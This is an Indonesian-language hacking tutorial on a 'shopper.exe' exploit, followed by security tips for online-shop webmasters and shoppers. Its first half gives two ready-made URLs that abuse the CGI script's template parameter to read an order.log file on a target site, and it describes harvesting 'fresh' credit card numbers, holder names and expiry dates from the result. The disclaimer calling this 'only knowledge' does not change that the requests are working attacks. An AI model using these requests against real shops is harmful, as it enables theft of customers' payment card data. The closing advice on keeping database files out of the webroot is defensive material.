SHOPPER EXE EXPLOIT
Berikut ini syntax yang bisa dicoba:
http://www.situs-target.com/cgi-bin/shopper.exe?search=action&keywords=Dy4-VoN%2520&template=order.log
atau
http://www.situs-target.com/cgi-bin/shopper.cgi?search=action&keywords=Dy4-VoN%20&template=order.log
looding sebentar.......
Wah ternyata, banyak juga log file hasil shopping yang ditemukan....
Setelah penulis cek dan lihat hasil log file nya banyak juga cc yang masih
fresh tapi tidak ada no cvv nya, hanya no pemegang kartu dan no cc dan
cardExpire.
Sekali lagi, ini hanya ilmu pengetahuan dan sangat tidak disarankan untuk
menyalahgunakannya.
Jika anda sebagai web master dari shopping online, tentunya anda harus lebih
berhati-hati dengan teknik ini.
SECURITY TIPS (TIPS UNTUK KEAMANAN
JARINGAN WEBSITE ANDA)
Khusus untuk Anda yang mengelola sebuah
situs online shopping, usahakanlah untuk membuat file database yang tidak bisa
diakses melalui directory public. Hindari meletakkan file database pada
webroot. (Tahu kan apa yang dimaksud dengan webroot? kalau nggak tahu banyaklah
membaca buku-buku tentang jaringan internet, atau bisa juga membaca-baca di
wikipedia.com)
Buatlah permission untuk mengakses database pada sebuah direktori khusus, hal
ini akan mencegah orang lain mendownload file database. Jangan gunakan nama
database default. Ubahlah menjadi nama lainnya yang Anda rasa aman. Untuk para
user, berhati-hatilah untuk berbelanja pada situs online. Carilah informasi
mengenai sistem keamanan situs tersebut. Dan pastikan bahwa halaman belanja
yang Anda buka bukanlah scam page, juga bukan phising.
|